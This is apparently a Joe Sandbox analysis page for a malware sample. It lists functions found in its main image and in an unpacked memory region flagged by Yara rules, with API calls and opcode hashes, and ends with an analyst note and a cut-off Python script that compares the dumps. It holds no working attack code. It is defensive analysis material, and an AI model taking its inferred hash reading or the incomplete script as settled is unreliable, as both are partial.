• Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0302672B), ref: 030224D6
• GetProcAddress.KERNEL32(00000000,00446CDC), ref: 030224E4
• GetProcAddress.KERNEL32(00000000,00446CF4), ref: 030224F2
• GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0302672B), ref: 03022520
• GetProcAddress.KERNEL32(00000000), ref: 03022527
• GetLastError.KERNEL32(?,?,?,0302672B), ref: 03022542
• GetLastError.KERNEL32(?,?,?,0302672B), ref: 0302254E
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 03022564
• __CxxThrowException@8.LIBVCRUNTIME ref: 03022572
Strings
Memory Dump Source
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
Yara matches
Similarity
• API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID: kernel32.dll
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002), ref: 0042FF24
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF37
• FreeLibrary.KERNEL32(00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000), ref: 0042FF5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: 11@$CorExitProcess$mscoree.dll
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,0304260C,00000001,00000001,?), ref: 03042415
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0304260C,00000001,00000001,?,?,?,?), ref: 0304249B
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 03042595
• __freea.LIBCMT ref: 030425A2
  • Part of subcall function 0304392E: RtlAllocateHeap.NTDLL(00000000,0301DAFC,00000000), ref: 03043960
• __freea.LIBCMT ref: 030425AB
• __freea.LIBCMT ref: 030425D0
Memory Dump Source
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
APIs
Memory Dump Source
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
Yara matches
Similarity
• API ID: __cftoe
APIs
• FindSITargetTypeInstance.LIBVCRUNTIME ref: 03038F97
• FindMITargetTypeInstance.LIBVCRUNTIME ref: 03038FB0
• FindVITargetTypeInstance.LIBVCRUNTIME ref: 03038FB7
• PMDtoOffset.LIBCMT ref: 03038FD6
Memory Dump Source
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
Yara matches
Similarity
• API ID: FindInstanceTargetType$Offset
APIs
Memory Dump Source
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
Yara matches
Similarity
• API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
APIs
• GetLastError.KERNEL32(?,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,DB2DD188), ref: 00428E08
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428E16
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E2F
• SetLastError.KERNEL32(00000000,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,DB2DD188), ref: 00428E81
Memory Dump Source
• Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
APIs
• GetLastError.KERNEL32(?,?,03039058,030369E9,03050927,00000008,03050C8C,?,?,?,?,03033CD2,?,?,0045A064), ref: 0303906F
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0303907D
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 03039096
• SetLastError.KERNEL32(00000000,?,03039058,030369E9,03050927,00000008,03050C8C,?,?,?,?,03033CD2,?,?,0045A064), ref: 030390E8
Memory Dump Source
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00404D88
• int.LIBCPMT ref: 00404D9F
  • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
  • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
• std::locale::_Getfacet.LIBCPMT ref: 00404DA8
• std::_Facet_Register.LIBCPMT ref: 00404DD9
• std::_Lockit::~_Lockit.LIBCPMT ref: 00404DEF
• __CxxThrowException@8.LIBVCRUNTIME ref: 00404E0D
Memory Dump Source
• Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 03014FEF
• int.LIBCPMT ref: 03015006
  • Part of subcall function 0301BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 0301BFF9
  • Part of subcall function 0301BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 0301C013
• std::locale::_Getfacet.LIBCPMT ref: 0301500F
• std::_Facet_Register.LIBCPMT ref: 03015040
• std::_Lockit::~_Lockit.LIBCPMT ref: 03015056
• __CxxThrowException@8.LIBVCRUNTIME ref: 03015074
Memory Dump Source
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040C1BF
• int.LIBCPMT ref: 0040C1D6
  • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
  • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
• std::locale::_Getfacet.LIBCPMT ref: 0040C1DF
• std::_Facet_Register.LIBCPMT ref: 0040C210
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040C226
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040C244
Memory Dump Source
• Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00405508
• int.LIBCPMT ref: 0040551F
  • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
  • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
• std::locale::_Getfacet.LIBCPMT ref: 00405528
• std::_Facet_Register.LIBCPMT ref: 00405559
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040556F
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040558D
Memory Dump Source
• Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004055A4
                                                  • int.LIBCPMT ref: 004055BB
                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                  • std::locale::_Getfacet.LIBCPMT ref: 004055C4
                                                  • std::_Facet_Register.LIBCPMT ref: 004055F5
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040560B
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00405629
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  • String ID:
                                                  • API String ID: 2243866535-0
                                                  • Opcode ID: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                  • Instruction ID: 8e1419515e35d36fc68c9e18a3e27bb0650dc63e33415fac19ced33b622727b6
                                                  • Opcode Fuzzy Hash: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                  • Instruction Fuzzy Hash: B911AC729006289BCF14EBA0C841AEEB360EF44319F14043FE811BB2D2DB389A058BDC
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00404C4A
                                                  • int.LIBCPMT ref: 00404C61
                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                  • std::locale::_Getfacet.LIBCPMT ref: 00404C6A
                                                  • std::_Facet_Register.LIBCPMT ref: 00404C9B
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404CB1
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CCF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  • String ID:
                                                  • API String ID: 2243866535-0
                                                  • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                  • Instruction ID: 7f60e392e4a430ae1f2c93b626e46d5b6b74a1b844d6ec56694562dd50cc071c
                                                  • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                  • Instruction Fuzzy Hash: 6811A072D001289BCB14EBA0C841AEEB7B0AF84319F11003EE511BB2E2DB3C990487D8
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0301C426
                                                  • int.LIBCPMT ref: 0301C43D
                                                    • Part of subcall function 0301BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 0301BFF9
                                                    • Part of subcall function 0301BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 0301C013
                                                  • std::locale::_Getfacet.LIBCPMT ref: 0301C446
                                                  • std::_Facet_Register.LIBCPMT ref: 0301C477
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0301C48D
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0301C4AB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  • String ID:
                                                  • API String ID: 2243866535-0
                                                  • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                  • Instruction ID: ee99ebb54650bfc668cec6ce073369031f421b64970e3526692b29f109cb7a1b
                                                  • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                  • Instruction Fuzzy Hash: A911043A8423289BDF15FBA4C840AFDBB74AF84310F140519E8167F2D0DB74CA54CB94
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 03014EB1
                                                  • int.LIBCPMT ref: 03014EC8
                                                    • Part of subcall function 0301BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 0301BFF9
                                                    • Part of subcall function 0301BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 0301C013
                                                  • std::locale::_Getfacet.LIBCPMT ref: 03014ED1
                                                  • std::_Facet_Register.LIBCPMT ref: 03014F02
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 03014F18
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03014F36
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  • String ID:
                                                  • API String ID: 2243866535-0
                                                  • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                  • Instruction ID: a882a1cfbee5abdc9be15c71447a949f8f568d17cf667afb1cc38025a1765ff0
                                                  • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                  • Instruction Fuzzy Hash: 0111C47AC023289BCF16EBA4C844AFDBBB4AF80710F180519E9156F2E0DB74DA54CB95
                                                  APIs
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0303898A
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 03038A43
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: 11@$@fB$csm
                                                  • API String ID: 3480331319-1464837749
                                                  • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                  • Instruction ID: 95cf552b6eb9e897ed7107fb1bca8f2627713e48e3ab4a4a60d2ef7103982ae1
                                                  • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                  • Instruction Fuzzy Hash: 1B41D934A02309DBCF10DF28C844ADEBBF9AF46314F18C196F8155B391D7329A19CB91
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                  • String ID: 11@
                                                  • API String ID: 531285432-1785270423
                                                  • Opcode ID: 0e36c963428b9d60b974f18f0769f742c4f51e3c626c870dcc3986d9ed4dafa0
                                                  • Instruction ID: 5ee48cf3c78ecc5b6537ee055918bb6364c51208e2805909369ee9a6debb6cd6
                                                  • Opcode Fuzzy Hash: 0e36c963428b9d60b974f18f0769f742c4f51e3c626c870dcc3986d9ed4dafa0
                                                  • Instruction Fuzzy Hash: E5213075D001099FDF04EFA5DC419BEB7B8AF48718B10406AF901B7291D678AD059B65
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                  • String ID: 11@
                                                  • API String ID: 531285432-1785270423
                                                  • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                  • Instruction ID: a6ef0723e36d7092058eb371145d20e088bdf41a4b61c43760bc159ee55fa4ba
                                                  • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                  • Instruction Fuzzy Hash: DC215179A012199FDF00EF98DD81DFFB7B8EF48710F100069E901AB260D774AD119B90
                                                  APIs
                                                  • SetEvent.KERNEL32(?,00000000), ref: 00423759
                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423741
                                                    • Part of subcall function 0041B74C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B76D
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0042378A
                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004237B3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                  • String ID: 11@
                                                  • API String ID: 2630251706-1785270423
                                                  • Opcode ID: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                  • Instruction ID: 33ce48ef146ac78a3ef221314cc781bfd8a3c25b4f9a6e194e2960aa52b33145
                                                  • Opcode Fuzzy Hash: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                  • Instruction Fuzzy Hash: 9C110B757002106BCF047F65DC85DAE7765EF84772B10416BFA05D7292CFAC9E41CA98
                                                  APIs
                                                  • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE41
                                                  • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE65
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE78
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE86
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                  • String ID: pScheduler
                                                  • API String ID: 3657713681-923244539
                                                  • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                  • Instruction ID: 46b9ecfe0875f7f86596c353a9bffc422044863c42dab0ab2bac390bf5a45ba1
                                                  • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                  • Instruction Fuzzy Hash: 8FF0593594070863C324EB15DC828DEB3799E91728360812FE40563182CF3CAE8AC69D
                                                  APIs
                                                  • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E65F
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E672
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E680
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                  • String ID: 11@$pContext
                                                  • API String ID: 1990795212-1086721755
                                                  • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                  • Instruction ID: 1f218d0b40ab772f1aed9042d58143e35ca4ab3a9892fa22be9c34d269449320
                                                  • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                  • Instruction Fuzzy Hash: 45E06139B0011457CB04FB66DC06C5DB7A8AEC0B14750006FF901A3342DFB8A90585C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                  • Instruction ID: 7eacffcc392e6897453e427a1bc5d3d4951d53cce7b4b374ddd0667b65be5727
                                                  • Opcode Fuzzy Hash: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                  • Instruction Fuzzy Hash: FF718E31B00266DBCB21CF95E884ABFBB75EF45360FA8426BE81057280D7789D41C7E9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                  • Instruction ID: 12a86c76463fcef3196af7e717d55397a3bcf7e6e290be06600e38850b60c878
                                                  • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                  • Instruction Fuzzy Hash: C6718075A02216DBCB21CF99C884BBFFBBDEF47718F184269E41167290DB709941CBA1
                                                  APIs
                                                    • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                  • _free.LIBCMT ref: 00430B6F
                                                  • _free.LIBCMT ref: 00430B86
                                                  • _free.LIBCMT ref: 00430BA5
                                                  • _free.LIBCMT ref: 00430BC0
                                                  • _free.LIBCMT ref: 00430BD7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3033488037-0
                                                  • Opcode ID: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                  • Instruction ID: b3708cb7fd5f7c05c7b70e76ebc142bc523ed94c66de99b1f2255d1376b2cc69
                                                  • Opcode Fuzzy Hash: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                  • Instruction Fuzzy Hash: BD51DF31A00304ABDB21DF6AC851A6BB7F4EF58724F14566EE809DB250E739A901CB48
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3033488037-0
                                                  • Opcode ID: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
                                                  • Instruction ID: 767a5963caa3ee0d278c83b8cf6d6b70882343888d41715c9756fde31afdcffd
                                                  • Opcode Fuzzy Hash: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
                                                  • Instruction Fuzzy Hash: 5D51C5B5A01705AFDB60DF29DC41BAAF7F4EF49720B1445B9E909EB250E731EA11CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                  • Instruction ID: 2269d71fc1307fb615fcd26a16e66de3d258f5a42cea17c2f792775dd2d74ff0
                                                  • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                  • Instruction Fuzzy Hash: E541C432E00204AFCB10DF78C981A5AB7B5EF89714F15456EE516EB391DB35ED02CB84
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                  • Instruction ID: 152d4ad650f78ec8487043b466758830a206fee9e601dafc91fab970e94c20e5
                                                  • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                  • Instruction Fuzzy Hash: B041B0B6A013049BCB14DF78C980AAEB7F9EF89714B1945A8D915EB381D731EA41CB80
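The preceding blocks show the same Opcode ID reported twice with different Instruction IDs: 80a228f6... at 00404C4A in the main image (Offset 00400000, based on PE: true) and again at 03014EB1 in the unpacked region (Offset 03010000, based on PE: false, Yara matches), and likewise 709da5f2... for the _free wrapper in both dumps. That pattern is consistent with the Opcode ID hashing only the opcode sequence while the Instruction ID also covers operands, so a function copied or relocated to another base keeps its Opcode ID and loses its Instruction ID; the report does not state the hash definitions, so treat that reading as an inference. The script below is an added analyst example, not Joe Sandbox code or output from the report: it takes the Similarity fields of the blocks above (values copied verbatim from this page) and groups them to show which functions the in-memory region shares with the main image. Only the base-address field of the .sdmp file name is decoded, because the page confirms it against each block's Offset; the other fields are left alone.

```python
"""Cross-dump function matching on Joe Sandbox "Similarity" fields.

Added analyst example, not part of the Joe Sandbox report.  RECORDS are
copied from the function blocks on this page for the main image
(Offset 00400000) and the unpacked region (Offset 03010000).  The
meaning of the .sdmp name fields other than the base address is not
decoded here (assumption: only field 4 is known to be the base).
"""
from collections import defaultdict

MAIN_SRC = ("00000000.00000002.4502940615.0000000000400000"
            ".00000040.00000001.01000000.00000003.sdmp")
HEAP_SRC = ("00000000.00000002.4504459250.0000000003010000"
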